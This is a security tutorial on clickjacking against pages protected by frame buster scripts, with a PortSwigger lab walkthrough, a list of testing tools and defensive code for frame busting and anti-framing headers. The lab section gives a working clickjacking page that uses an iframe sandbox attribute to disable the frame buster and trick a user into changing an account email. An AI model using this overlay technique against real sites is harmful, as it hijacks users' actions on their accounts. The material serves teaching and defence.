05 Mar, 2024

Clickjacking with a frame buster script

Clickjacking involves tricking users into interacting with unintended elements by overlaying them with legitimate content. A frame buster script, also known as frame busting or frame breaking, is a security mechanism designed to prevent a webpage from being framed or embedded within an iframe on another site.

Clickjacking:

Description: Clickjacking, also known as UI redressing, is a web security vulnerability in which an attacker tricks a user into clicking on something different from what the user perceives. This is typically achieved by placing invisible or transparent elements over seemingly legitimate clickable elements on a webpage.

Attack Scenario: Attackers may overlay an invisible iframe over a targeted website, tricking users into interacting with elements within the iframe without their knowledge.

Frame Buster Script:

Description: A frame buster script, also known as a frame-breaking script or framekiller script, is a piece of JavaScript implemented on a webpage to prevent the page from being framed or embedded within an iframe. Its purpose is to defend against clickjacking by breaking out of any frame that attempts to encapsulate the page.

Implementation: The frame buster script typically checks whether the page is the top-level window and, if it is not, redirects the top-level window to the original page, preventing the page from being displayed within a frame.
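As an added illustration (this code is not from the original article or from PortSwigger), the check described above is shown below in JavaScript next to a more defensive "hide until confirmed top-level" variant. The functions operate on window- and document-like objects so they can run under Node.js with the constructed stubs at the bottom; in a browser you would call applyDefensiveFrameBuster(window, document) from a script near the top of a body served with display:none. Any frame buster depends on the framed page's JavaScript actually executing; a framing page that prevents scripts from running (for example an iframe sandbox attribute that lacks allow-scripts, as in the lab code later on this page) leaves the script unexecuted. The hidden-by-default variant at least fails closed in that case, which is also why header-based controls remain the primary defense. The URLs in the stubs are constructed.

```javascript
// Added example (not code from the original article or from PortSwigger):
// the frame-buster check described above, next to a "hide until top-level"
// variant that fails closed. It works on window/document-like objects so it
// can run under Node.js with the constructed stubs at the bottom.

// True when `win` is rendered inside another document's frame. Reading
// win.top can throw in some cross-origin situations; a top-level window
// never throws here, so a throw is treated as "framed".
function isFramed(win) {
  try {
    return win.top !== win.self;
  } catch (e) {
    return true;
  }
}

// Classic frame buster: redirect the top-level window to this page.
// It only runs if the framing page allows this page's scripts to execute.
function naiveFrameBuster(win) {
  if (!isFramed(win)) return 'top-level';
  try {
    win.top.location = win.self.location;
  } catch (e) {
    // Navigation refused (cross-origin or policy); nothing else to do here.
  }
  return 'busted';
}

// Defensive variant ("Busting Frame Busting", Rydstedt et al., 2010): the
// page is served with <body style="display:none"> and only revealed once the
// script confirms it is top-level. If the framing page blocks scripts, the
// script never runs and the content simply stays hidden.
function applyDefensiveFrameBuster(win, doc) {
  if (!isFramed(win)) {
    doc.body.style.display = 'block';
    return 'revealed';
  }
  naiveFrameBuster(win); // best effort; content remains hidden either way
  return 'hidden';
}

// --- Constructed stand-ins so the functions can be exercised outside a browser.
// In a real page you would call applyDefensiveFrameBuster(window, document).
function makeWindow(isTopLevel) {
  const win = { location: 'https://app.example/my-account' }; // constructed URL
  win.self = win;
  win.top = isTopLevel ? win : { location: 'https://framing-site.example/' }; // constructed URL
  return win;
}

function makeDocument() {
  return { body: { style: { display: 'none' } } };
}

// Demonstration: top-level page is revealed; framed page stays hidden and
// the top-level window is pointed at the page's own location.
const topDoc = makeDocument();
console.log(applyDefensiveFrameBuster(makeWindow(true), topDoc), topDoc.body.style.display);
const framedWin = makeWindow(false);
const framedDoc = makeDocument();
console.log(applyDefensiveFrameBuster(framedWin, framedDoc), framedDoc.body.style.display, framedWin.top.location);
```

The two return values ('revealed' versus 'hidden') make the fail-closed behaviour explicit: the page content is only shown when the script has positively confirmed that it is the top-level document.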

Clickjacking with Frame Buster Script:

Attack Description:

An attacker identifies a target website that uses a frame buster script to prevent framing.

The attacker employs various techniques to circumvent or disable the frame buster script, allowing the target site to be framed.

The attacker overlays the framed target site with invisible elements, tricking users into interacting with these elements while interacting with the target site underneath.

Simultaneously, the attacker may inject malicious scripts into the target site, exploiting DOM-Based XSS vulnerabilities.

Example Scenario:

A popular social media site implements a frame buster script to prevent clickjacking.

An attacker identifies and exploits a vulnerability that allows them to disable or bypass the frame buster script.

The attacker then overlays the social media site with invisible elements, tricking users into performing unintended actions.

Malicious scripts are injected through DOM-Based XSS, allowing the attacker to steal user credentials or perform other malicious activities.

Exploitation examples

To better understand the Clickjacking with a frame buster script vulnerability, let’s look at one of the labs from PortSwigger, a well-known web security company. This lab demonstrates a Clickjacking with a frame buster script vulnerability.

Log in to the account.

Then go to “My account”.

After that you need to change the URL https://0af9002204c308538175a2d900e70088.web-security-academy.net/my-account?id=wiener to https://0af9002204c308538175a2d900e70088.web-security-academy.net/[email protected]

As we can see, the “Email” field is pre-filled.

Then we use this code to create the clickjacking page:

<style>
  #target_website {
    position: relative;
    width: 300px;
    height: 600px;
    opacity: 0.5;
    z-index: 2;
    border: none;
  }
  #decoy_website {
    position: absolute;
    top: 470px;
    left: 125px;
    z-index: 1;
  }
</style>
<div id="decoy_website">Click me</div>
<iframe id="target_website" sandbox="allow-forms" src="https://0af9002204c308538175a2d900e70088.web-security-academy.net/my-account?email=wiener0@normal-user.net" scrolling="no"></iframe>

As we can see, the clickjacking vulnerability worked.

Scanners that detect vulnerabilities

Burp Suite:

Description: A web application security testing tool with features for scanning and analyzing web applications.

OWASP Zed Attack Proxy (ZAP):

Description: An open-source security testing tool designed to find vulnerabilities in web applications.

Selenium:

Description: A browser automation tool that can be used for testing web applications, including interactions with iframes.

BeEF (Browser Exploitation Framework):

Description: A penetration testing tool focused on web browsers, allowing for testing against various client-side vulnerabilities.

Clickjacking Tester (Browser Extension):

Description: A browser extension designed to detect and test for Clickjacking vulnerabilities.

X-Frame-Bypass:

Description: A tool specifically designed to bypass frame busters and test for Clickjacking vulnerabilities.

Average CVSS score

Assigning a specific Common Vulnerability Scoring System (CVSS) score to “Clickjacking with a Frame Buster Script” is not straightforward, because the score depends on the context of the affected application. CVSS combines several metrics to assess the severity of a vulnerability.

CWE information

Clickjacking (UI Redress, CWE-1021):

Description: Clickjacking involves tricking a user into interacting with unintended elements by overlaying them with legitimate content.

CWE Identifier: CWE-1021 (UI Redress)

Frame Busting Bypass (CWE-1021):

Description: Frame busting (frame-breaking) scripts are used to prevent a webpage from being framed or embedded within an iframe. A weakness in, or bypass of, the frame buster can lead to Clickjacking vulnerabilities.

CWE Identifier: CWE-1021 (UI Redress)

Conclusion and Mitigation

Clickjacking with a frame buster script represents a scenario where an attacker attempts to bypass or disable frame buster scripts to carry out Clickjacking attacks. This combination poses a significant threat to web applications, potentially leading to unauthorized actions performed by users unknowingly interacting with deceptive elements.

Mitigation Strategies:

Secure Frame Busting Implementation:

Ensure that frame buster scripts are securely implemented, resistant to bypass attempts, and effectively prevent the embedding of your web application within iframes on malicious sites.

Content Security Policy (CSP):

Implement a robust Content Security Policy to control the sources from which resources, including scripts, can be loaded. This helps mitigate the risk of unauthorized script execution.
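The following is an added example (not part of the original article) of what the CSP mitigation and the related X-Frame-Options header look like on the server side, together with the kind of passive response-header check that the scanners listed earlier perform. The CSP directive that governs who may frame a page is frame-ancestors; unlike a frame buster script, these headers are enforced by the browser whether or not the page's JavaScript runs. The code runs offline under Node.js; the setHeader call matches Node's http.ServerResponse, and the sample headers and origins (partner.example and the like) are constructed for the example.

```javascript
// Added example (not from the original article): server-side anti-framing
// headers and a passive header check of the kind scanners perform.
// Runs offline under Node.js; sample headers and origins are constructed.

// Headers that stop framing whether or not the page's own JavaScript runs.
// `allowedOrigins` lists CSP source expressions permitted to frame the page
// (e.g. ["'self'", "https://partner.example"]); empty means nobody may.
function buildAntiFramingHeaders(allowedOrigins = []) {
  const headers = {};
  if (allowedOrigins.length === 0) {
    headers['Content-Security-Policy'] = "frame-ancestors 'none'";
    headers['X-Frame-Options'] = 'DENY'; // legacy fallback for older browsers
  } else if (allowedOrigins.length === 1 && allowedOrigins[0] === "'self'") {
    headers['Content-Security-Policy'] = "frame-ancestors 'self'";
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  } else {
    // Only CSP can express a list of third-party origins; X-Frame-Options
    // ALLOW-FROM is obsolete and ignored by modern browsers, so it is omitted.
    headers['Content-Security-Policy'] = 'frame-ancestors ' + allowedOrigins.join(' ');
  }
  return headers;
}

// Apply the headers to a Node.js http.ServerResponse (anything with setHeader).
function setAntiFramingHeaders(res, allowedOrigins = []) {
  for (const [name, value] of Object.entries(buildAntiFramingHeaders(allowedOrigins))) {
    res.setHeader(name, value);
  }
}

// Return the frame-ancestors source list from a CSP value, or null if absent.
function parseFrameAncestors(cspValue) {
  if (!cspValue) return null;
  for (const directive of cspValue.split(';')) {
    const tokens = directive.trim().split(/\s+/);
    if (tokens[0].toLowerCase() === 'frame-ancestors') {
      return tokens.slice(1).map((t) => t.toLowerCase());
    }
  }
  return null;
}

// Passive check over a response's headers (any capitalisation of names).
// Returns whether framing is restricted, by which header, and the findings.
function assessFramingProtection(rawHeaders) {
  const headers = {};
  for (const [name, value] of Object.entries(rawHeaders)) {
    headers[name.toLowerCase()] = value;
  }
  const reasons = [];
  const ancestors = parseFrameAncestors(headers['content-security-policy']);
  let byCsp = false;
  if (ancestors === null) {
    reasons.push('CSP frame-ancestors directive missing');
  } else if (ancestors.includes('*') || ancestors.includes('https:') || ancestors.includes('http:')) {
    reasons.push('CSP frame-ancestors allows framing from any origin');
  } else {
    byCsp = true;
  }
  const xfo = String(headers['x-frame-options'] || '').trim().toUpperCase();
  let byXfo = false;
  if (xfo === 'DENY' || xfo === 'SAMEORIGIN') {
    byXfo = true;
  } else if (xfo === '') {
    reasons.push('X-Frame-Options missing');
  } else {
    reasons.push('X-Frame-Options value not enforced by modern browsers: ' + xfo);
  }
  return { protected: byCsp || byXfo, byCsp, byXfo, reasons };
}

// Constructed sample: response of a page relying on a frame-buster script alone.
const SAMPLE_FRAME_BUSTER_ONLY = {
  'Content-Type': 'text/html; charset=utf-8',
  'Set-Cookie': 'session=constructed-example; HttpOnly; Secure',
};

console.log(assessFramingProtection(SAMPLE_FRAME_BUSTER_ONLY)); // not protected
console.log(assessFramingProtection(buildAntiFramingHeaders())); // protected by both headers
```

A page that relies only on a frame buster produces no anti-framing header at all, so the passive check reports it as unprotected; the hardened headers are reported as protected by both CSP and X-Frame-Options. Keep both headers: frame-ancestors is the authoritative control, and X-Frame-Options covers older browsers that do not evaluate CSP.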

Regular Security Audits:

Conduct regular security audits, including automated and manual testing, to identify and address vulnerabilities in your web application. Pay specific attention to Clickjacking and frame buster vulnerabilities.

Input Validation and Output Encoding:

Implement strict input validation to ensure that user input is sanitized and adheres to expected formats.

Apply output encoding to user-supplied data before rendering it in the browser, preventing the execution of malicious scripts.

Update and Patching:

Keep all software components, including web servers, frameworks, and libraries, up to date with the latest security patches to address known vulnerabilities, including those related to Clickjacking and frame busting.

Security Awareness Training:

Educate developers, administrators, and users about the risks associated with Clickjacking and the importance of frame buster scripts in preventing unauthorized embedding.

Monitoring and Incident Response:

Implement monitoring mechanisms to detect anomalous activities and potential attacks. Have an incident response plan in place to respond promptly to security incidents related to Clickjacking.

Defense-in-Depth:

Implement a defense-in-depth strategy with multiple layers of security controls. This can include network-level controls, server-side controls, and client-side controls to enhance overall security.
